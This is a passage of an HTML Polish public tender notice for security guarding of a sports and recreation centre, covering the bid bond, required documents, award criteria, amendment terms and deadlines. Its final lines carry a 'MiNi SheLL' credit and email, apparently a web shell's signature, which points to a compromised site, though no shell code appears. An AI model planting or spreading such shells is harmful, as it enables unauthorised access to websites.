      ubezpieczenia odpowiedzialności cywilnej przedsiębiorcy wykonującego działalność 
      gospodarczą w zakresie usług ochrony osób i mienia (Dz.U.2013.1550), 
<br /><b>III.5.2) W ZAKRESIE KRYTERIÓW SELEKCJI:</b><br /></div><b>
                III.6) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 2 USTAWY PZP
              </b><br /><div style="padding-left: 20px"></div><b>
                III.7) INNE DOKUMENTY NIE WYMIENIONE W pkt III.3) - III.6)
              </b><div style="padding-left: 20px">1.Oświadczenie wykonawcy o przynależności albo braku przynależności do tej samej 
      grupy kapitałowej; w przypadku przynależności do tej samej grupy kapitałowej  
        Wykonawca może złożyć wraz z oświadczeniem dokumenty bądź informacje 
        potwierdzające, że powiązania z innym wykonawcą nie prowadzą do zakłócenia 
        konkurencji w postępowaniu.
2. 	Poza formularzem ofertowym, którego wzór stanowi załącznik nr 1 do SIWZ, Wykonawca zobowiązany jest załączyć do oferty:
1)	stosowne pełnomocnictwa ( w przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia oraz w sytuacji, gdy dokumentów składających się na ofertę nie podpisują osoby upoważnione do reprezentacji Wykonawcy zgodnie z odpowiednim dokumentem rejestrowym),
2)	oświadczenie o spełnieniu warunków udziału w postępowaniu, 
3)	oświadczenie o braku podstaw do wykluczenia,
4)	jeśli Wykonawca w celu spełnienia warunków udziału w postępowaniu polega na zasobach innych podmiotów na zasadach określonych w art. 22a Pzp  do oferty dołącza zobowiązanie tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na potrzeby realizacji zamówienia. 
Aby dokumenty te mogły zostać uznane przez Zamawiającego za wystarczające, muszą zawierać co najmniej informacje dotyczące: 
a)	zakresu dostępnych Wykonawcy zasobów innego podmiotu,
b)	sposobu wykorzystania zasobów innego podmiotu przez Wykonawcę, przy wykonaniu zamówienia publicznego,
c)	zakresu i okresu udziału innego podmiotu przy wykonywaniu zamówienia publicznego,
d)	czy podmiot, na zdolnościach którego Wykonawca polega w odniesieniu do postawionych warunków udziału w postępowaniu, zrealizuje usługi do realizacji których, te zdolności są wymagane.
5)	Dowód wniesienia wadium.
</div></div></div><div class="headerLarge_xforms" style="text-align: left"><u>
              SEKCJA IV: PROCEDURA
            </u></div><div style="padding-left: 20px;"><div style="text-align: left"><b>IV.1) OPIS </b><br /><b>IV.1.1) Tryb udzielenia zamówienia: </b>
                przetarg nieograniczony
              <br /><b>IV.1.2) Zamawiający żąda wniesienia wadium:</b><div style="padding-left: 20px">
                  tak,
                  <br />
                  Informacja na temat wadium
                  <br />W niniejszym postępowaniu o udzielenie zamówienia Zamawiający wymaga 
      wniesienia wadium przed upływem terminu składania ofert. 
2.  Wysokość wadium wynosi 4.000,00 zł (słownie: cztery tysiące złotych) dla całego 
      przedmiotu zamówienia. 
3.  Wadium Wykonawca może wnieść w akceptowanej przez Zamawiającego formie:  
     a) pieniężnej,
     b) poręczeń bankowych lub poręczeń spółdzielczej kasy oszczędnościowo-
           kredytowej, z tym, że poręczenie kasy jest zawsze poręczeniem pieniężnym,  
     c)   gwarancji bankowych,  
     d)   gwarancji ubezpieczeniowych,  
     e)  poręczeń udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2 
           ustawy z dnia 9 listopada 2000r.  o utworzeniu Polskiej Agencji Rozwoju 
           Przedsiębiorczości (Dz. U. z 2007 r. Nr 42, poz. 275, z 2008 r.Nr 116, poz. 730 
           i 732 i Nr 227, poz. 1505 oraz z 2010 r. Nr 96, poz. 620).  
4. Wadium w akceptowanej przez Zamawiającego formie należy wnieść do momentu 
    ostatecznego składania ofert. Wadium w formie pieniężnej należy wnieść przelewem 
    na konto Zamawiającego: 97 8009 1062 0016 4207 2007 0002. Na przelewie należy 
    umieścić adnotację: Wadium na przetarg nieograniczony na świadczenie usług 
    dozoru i ochrony mienia dla Nowodworskiego Ośrodka Sportu  i Rekreacji . 
5. Zamawiający informuje, że za termin wniesienia wadium zostanie przyjęty termin 
     uznania rachunku Zamawiającego.  
6. W przypadku wniesienia wadium w formie poręczenia lub gwarancji, Zamawiający 
    wymaga, aby w swojej treści zawierało zobowiązanie do bezwarunkowej zapłaty 
    całości sumy wadium na pierwsze żądanie Zamawiającego oraz przewidywało 
    bezwarunkową utratę wadium na rzecz Zamawiającego w przypadkach określonych 
    w art. 46 ust. 4a i art. 46 ust. 5 ustawy Prawo zamówień publicznych. 
7. W przypadku, gdy wadium nie zostało wniesione lub zostało wniesione w sposób 
    nieprawidłowy, Zamawiający odrzuci ofertę Wykonawcę. 
8. Warunki zwrotu i utraty wadium określa ustawa Prawo zamówień publicznych. 
9. Dokumenty dotyczące ustanowienia wadium muszą zachowywać ważność przez cały 
    okres związania Wykonawcy ofertą.
</div><br /><b>IV.1.3) Przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b><div style="padding-left: 20px">
                  nie
                </div><br /><b>
                IV.1.4) Wymaga się złożenia ofert w postaci katalogów elektronicznych lub dołączenia do ofert katalogów elektronicznych:
              </b><div style="padding-left: 20px">
                  nie
                <br />
                Dopuszcza się złożenie ofert w postaci katalogów elektronicznych lub dołączenia do ofert katalogów elektronicznych:
                <br />
                  nie
                <br />
                Informacje dodatkowe:
                <br /></div><br /><b>
                IV.1.5.) Wymaga się złożenia oferty wariantowej:
              </b><div style="padding-left: 20px">
                  nie
                <br />
                Dopuszcza się złożenie oferty wariantowej
                <br />
                  nie
                <br />
                Złożenie oferty wariantowej dopuszcza się tylko z jednoczesnym złożeniem oferty zasadniczej:
                <br />
                  nie
                </div><br /><b>
                IV.1.6) Przewidywana liczba wykonawców, którzy zostaną zaproszeni do udziału w postępowaniu
              </b><br /><i>
                (przetarg ograniczony, negocjacje z ogłoszeniem, dialog konkurencyjny, partnerstwo innowacyjne)
              </i><div style="padding-left: 20px">
                Liczba wykonawców  <br />
                Przewidywana minimalna liczba wykonawców  <br />
                Maksymalna liczba wykonawców  <br />
                Kryteria selekcji wykonawców:
                <br /></div><br /><b>
                IV.1.7) Informacje na temat umowy ramowej lub dynamicznego systemu zakupów:
              </b><div style="padding-left: 20px">
                Umowa ramowa będzie zawarta:
                <br /><br />
                Czy przewiduje się ograniczenie liczby uczestników umowy ramowej:
                <br />
                  nie
                <br />
                Informacje dodatkowe:
                <br /><br />
                Zamówienie obejmuje ustanowienie dynamicznego systemu zakupów:
                <br />
                  nie
                <br />
                Informacje dodatkowe:
                <br /><br />
                W ramach umowy ramowej/dynamicznego systemu zakupów dopuszcza się złożenie ofert w formie katalogów elektronicznych:
                <br />
                  nie
                <br />
                Przewiduje się pobranie ze złożonych katalogów elektronicznych informacji potrzebnych do sporządzenia ofert w ramach umowy ramowej/dynamicznego systemu zakupów:
                <br />
                  nie
                </div><br /><b>IV.1.8) Aukcja elektroniczna </b><br /><b>
                Przewidziane jest przeprowadzenie aukcji elektronicznej </b><i>(przetarg nieograniczony, przetarg ograniczony, negocjacje z ogłoszeniem) </i>
                nie
              <br /><b>Należy wskazać elementy, których wartości będą przedmiotem aukcji elektronicznej: </b><br /><b>Przewiduje się ograniczenia co do przedstawionych wartości, wynikające z opisu przedmiotu zamówienia:</b><br />
                nie
              <br />

              
                Należy podać, które informacje zostaną udostępnione wykonawcom w trakcie aukcji elektronicznej oraz jaki będzie  termin ich udostępnienia:
              
              <br />
              Informacje dotyczące przebiegu aukcji elektronicznej: 
              <br />
              Jaki jest przewidziany sposób postępowania w toku aukcji elektronicznej i jakie będą warunki, na jakich wykonawcy będą mogli licytować (minimalne wysokości postąpień): 
              <br />
              Informacje dotyczące wykorzystywanego sprzętu elektronicznego, rozwiązań i specyfikacji technicznych w zakresie połączeń:
              <br />
              Wymagania dotyczące rejestracji i identyfikacji wykonawców w aukcji elektronicznej: 
              <br />


              Informacje o liczbie etapów aukcji elektronicznej i czasie ich trwania: 
              <div style="padding-left: 20px">
                  Aukcja wieloetapowa
                  <table><tr><td>etap nr</td><td>czas trwania etapu</td></tr><tr><td></td><td></td></tr></table><br />
                Czy wykonawcy, którzy nie złożyli nowych postąpień, zostaną zakwalifikowani do następnego etapu:
                
                  nie
                <br />
                Warunki zamknięcia aukcji elektronicznej:
                <br /></div><br /><b>IV.2) KRYTERIA OCENY OFERT </b><br /><b>IV.2.1) Kryteria oceny ofert: </b><br /><b>IV.2.2) Kryteria</b><br /><div style="padding-left: 20px"><table><tr><td><i>Kryteria</i></td><td><i>Znaczenie</i></td></tr><tr><td>cena</td><td>60</td></tr><tr><td>liczba kwalifikowanych pracowników ochrony fizycznej, którzy jednocześnie posiadają kwalifikacje pracowników zabezpieczenia technicznego, przeznaczonych do realizacji zamówienia </td><td>20</td></tr><tr><td>liczba przeszkolonych w 2016r. pracowników ochrony fizycznej/pracowników zabezpieczenia technicznego, w zakresie udzielania pierwszej pomocy przedmedycznej, przeznaczonych do realizacji zamówienia </td><td>10</td></tr><tr><td>czas dojazdu grupy interwencyjnej do siedziby Zamawiającego od momentu powiadomienia o incydencie </td><td>10</td></tr></table></div><br /><b>IV.2.3) Zastosowanie procedury, o której mowa w art. 24aa ust. 1 ustawy Pzp </b>(przetarg nieograniczony)
              <br />
                nie
              <br /><b>IV.3) Negocjacje z ogłoszeniem, dialog konkurencyjny, partnerstwo innowacyjne </b><br /><b>IV.3.1) Informacje na temat negocjacji z ogłoszeniem</b><br />
              Minimalne wymagania, które muszą spełniać wszystkie oferty:
              <br /><br />
              Przewidziane jest zastrzeżenie prawa do udzielenia zamówienia na podstawie ofert wstępnych bez przeprowadzenia negocjacji
              
                nie
              <br />
              Przewidziany jest podział negocjacji na etapy w celu ograniczenia liczby ofert:
              
                nie
              <br />
              Należy podać informacje na temat etapów negocjacji (w tym liczbę etapów):
              <br /><br />
              Informacje dodatkowe
              <br /><br /><br /><b>IV.3.2) Informacje na temat dialogu konkurencyjnego</b><br />
              Opis potrzeb i wymagań zamawiającego lub informacja o sposobie uzyskania tego opisu:
              <br /><br />
              Informacja o wysokości nagród dla wykonawców, którzy podczas dialogu konkurencyjnego przedstawili rozwiązania stanowiące podstawę do składania ofert, jeżeli zamawiający przewiduje nagrody:
              <br /><br />
              Wstępny harmonogram postępowania:
              <br /><br />
              Podział dialogu na etapy w celu ograniczenia liczby rozwiązań:
              
                nie
              <br />
              Należy podać informacje na temat etapów dialogu:
              <br /><br /><br />
              Informacje dodatkowe:
              <br /><br /><b>IV.3.3) Informacje na temat partnerstwa innowacyjnego</b><br />
              Elementy opisu przedmiotu zamówienia definiujące minimalne wymagania, którym muszą odpowiadać wszystkie oferty:
              <br /><br />
              Podział negocjacji na etapy w celu ograniczeniu liczby ofert podlegających negocjacjom poprzez zastosowanie kryteriów oceny ofert wskazanych w specyfikacji istotnych warunków zamówienia:
              <br />
                nie
              <br />
              Informacje dodatkowe:
              <br /><br /><b>IV.4) Licytacja elektroniczna  </b><br />
              Adres strony internetowej, na której będzie prowadzona licytacja elektroniczna:
              <br /><div style="padding-left: 20px"></div>

              Adres strony internetowej, na której jest dostępny opis przedmiotu zamówienia w licytacji elektronicznej:
              <br /><div style="padding-left: 20px"></div>

              Wymagania dotyczące rejestracji i identyfikacji wykonawców w licytacji elektronicznej, w tym wymagania techniczne urządzeń informatycznych:
              <br /><div style="padding-left: 20px"></div>

              Sposób postępowania w toku licytacji elektronicznej, w tym określenie minimalnych wysokości postąpień:
              <br /><div style="padding-left: 20px"></div>

              Informacje o liczbie etapów licytacji elektronicznej i czasie ich trwania: 
              <div style="padding-left: 20px">
                  Licytacja wieloetapowa
                  <table><tr><td>etap nr</td><td>czas trwania etapu</td></tr><tr><td></td><td></td></tr></table><br />
                Wykonawcy, którzy nie złożyli nowych postąpień, zostaną  zakwalifikowani do następnego etapu:
                
                  nie
                </div>

              Termin otwarcia licytacji elektronicznej:
              <br /><div style="padding-left: 20px"></div>

              Termin i warunki zamknięcia licytacji elektronicznej:
              <br /><div style="padding-left: 20px"></div><br />
              Istotne dla stron postanowienia, które zostaną wprowadzone do treści zawieranej umowy w sprawie zamówienia publicznego, albo ogólne warunki umowy, albo wzór umowy:
              <br /><div style="padding-left: 20px"></div><br />
              Wymagania dotyczące zabezpieczenia należytego wykonania umowy: 
              <br /><div style="padding-left: 20px"></div><br />
              Informacje dodatkowe:
              <br /><div style="padding-left: 20px"></div><b>IV.5) ZMIANA UMOWY</b><br /><b>Przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy:</b>
                tak

                <br />
                Należy wskazać zakres, charakter zmian oraz warunki wprowadzenia zmian:
                <br />Niedopuszczalne pod rygorem nieważności są zmiany postanowień zawartej umowy 
     w stosunku do treści oferty, na podstawie której dokonano wyboru Wykonawcy, 
     chyba że wystąpią następujące warunki zmiany umowy: 
      - w razie zmiany przepisów dotyczących: 
      a) stawki podatku od towarów i usług,
      b) wysokości minimalnego wynagrodzenia za pracę albo wysokości minimalnej  
           stawki godzinowej, ustalonych na podstawie przepisów ustawy z dnia 10 
           października 2002 r. o minimalnym wynagrodzeniu za pracę, 
      c) zasad podlegania ubezpieczeniom społecznym lub ubezpieczeniu zdrowotnemu 
           lub wysokości stawki składki na ubezpieczenia społeczne lub zdrowotne 
      -  jeżeli zmiany te będą miały wpływ na koszty wykonania zamówienia przez 
          Wykonawcę, zmianie mogą ulec ceny za przedmiot zamówienia, przy czym 
          w przypadku punktu a) zmiana stawki podatku od usług w zakresie całodobowej 
          stałej fizycznej ochrony  wskazanej  w formularzu ofertowo-cenowym powoduje 
          zmianę ceny brutto usług zakresie całodobowej stałej fizycznej ochrony z dniem 
          wejścia w życie odpowiedniego aktu prawnego dotyczącego zmiany stawki 
          podatki od towarów i usług i zostaje potwierdzona aneksem, zaś 
          w pozostałych przypadkach wskazanych w punktach a)-c) o każdej planowanej 
          zmianie cen Wykonawca obowiązany jest zawiadomić Zamawiającego na piśmie   
          dokumentując wpływ zmian przepisów na zmianę kosztów wykonania 
                  zamówienia przez Wykonawcę oraz na cenę  w zawartej umowie o wykonanie 
          usług w zakresie całodobowej stałej fizycznej ochrony, a zmiana cen odbywa się 
          na podstawie Aneksu do umowy, z mocą obowiązywania od dnia wejścia z życie 
          aktu prawnego wprowadzającego zmianę mającą wpływ na koszty wykonania 
          zamówienia przez Wykonawcę, o ile Zamawiający uzna zmianę ceny za zasadną 
          i udokumentowaną, 
      -   wystąpią zmiany w nazwach lub adresach stron, zmiany związane 
          z przekształceniem podmiotowym stron, 
      -  zmiany umowy są konieczne na skutek działania organów administracji lub 
         instytucji upoważnionych do wydania decyzji albo innych aktów władczych lub  
         nadzorczych, związanych z realizacją przedmiotu umowy, 
     -  nastąpi zmiana obowiązujących przepisów prawa, związanych z przedmiotowym 
         zamówieniem, które weszły w życie po zawarciu umowy,
     -  Wykonawca zaproponuje obniżenie ceny  usługi  lub wprowadzi upusty lub 
         promocje zaakceptowane przez Zamawiającego. 
     -  zaistnienie siły wyższej uniemożliwiającej okresowe wykonywanie przedmiotu 
          umowy, 
     -  wystąpią okoliczności, których nie można było przewidzieć w chwili zawarcia 
         umowy, a w związku z nimi wystąpi konieczność wprowadzenia zmian do 
         umowy, zaś zmiany te są korzystne dla Zamawiającego i zostaną zaakceptowane 
         przez Wykonawcę, oraz pozostałych wypadkach wskazanych w art. 144 ust. 1 
         ustawy Pzp. przy czym wszystkie zmiany w umowie zostają potwierdzone 
         aneksem w formie pisemnej.
<br /><b>IV.6) INFORMACJE ADMINISTRACYJNE </b><br /><br /><b>IV.6.1) Sposób udostępniania informacji o charakterze poufnym </b><i>(jeżeli dotyczy): </i><br /><br /><b>Środki służące ochronie informacji o charakterze poufnym</b><br /><br /><b>IV.6.2) Termin składania ofert lub wniosków o dopuszczenie do udziału w postępowaniu: </b><br />
              Data: 25/01/2017, godzina: 10:30,
              <br />
              Skrócenie terminu składania wniosków, ze względu na pilną potrzebę udzielenia zamówienia (przetarg nieograniczony, przetarg ograniczony, negocjacje z ogłoszeniem):
              <br />
                nie
              <br />
              Wskazać powody:
              <br /><br />
              Język lub języki, w jakich mogą być sporządzane oferty lub wnioski o dopuszczenie do udziału w postępowaniu
              <br />&gt;
              język polski<br /><b>IV.6.3) Termin związania ofertą: </b>
                okres w dniach: 30 (od ostatecznego terminu składania ofert)
              <br /><b>IV.6.4) Przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia:</b>
                nie
              <br /><b>IV.6.5) Przewiduje się unieważnienie postępowania o udzielenie zamówienia, jeżeli środki służące sfinansowaniu zamówień na badania naukowe lub prace rozwojowe, które zamawiający zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia, nie zostały mu przyznane</b>
                nie
              <br /><b>IV.6.6) Informacje dodatkowe:</b><br /></div></div></div>

Creat By MiNi SheLL
Email: jattceo@gmail.com